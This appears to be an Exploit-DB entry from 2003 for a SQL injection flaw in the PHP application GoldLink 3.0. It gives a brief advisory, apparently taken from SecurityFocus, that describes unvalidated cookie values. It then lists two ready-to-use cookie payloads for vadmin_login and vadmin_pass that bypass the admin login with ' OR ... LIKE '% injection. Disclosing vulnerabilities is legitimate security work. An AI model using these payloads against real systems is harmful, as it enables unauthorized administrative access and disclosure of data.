GoldLink 3.0 - Cookie SQL Injection

EDB-ID:

23259


Author:

Weke

Type:

webapps


Platform:

PHP

Date:

2003-10-18


source: https://www.securityfocus.com/bid/8847/info

GoldLink is prone to SQL injection attacks. This is due to insufficient validation of values supplied via cookies. As a result, it may be possible to manipulate SQL queries, potentially resulting in information disclosure, bulletin board compromise or other consequences. 

vadmin_login = ' OR Login LIKE '%

and

vadmin_pass = ' OR Password LIKE '%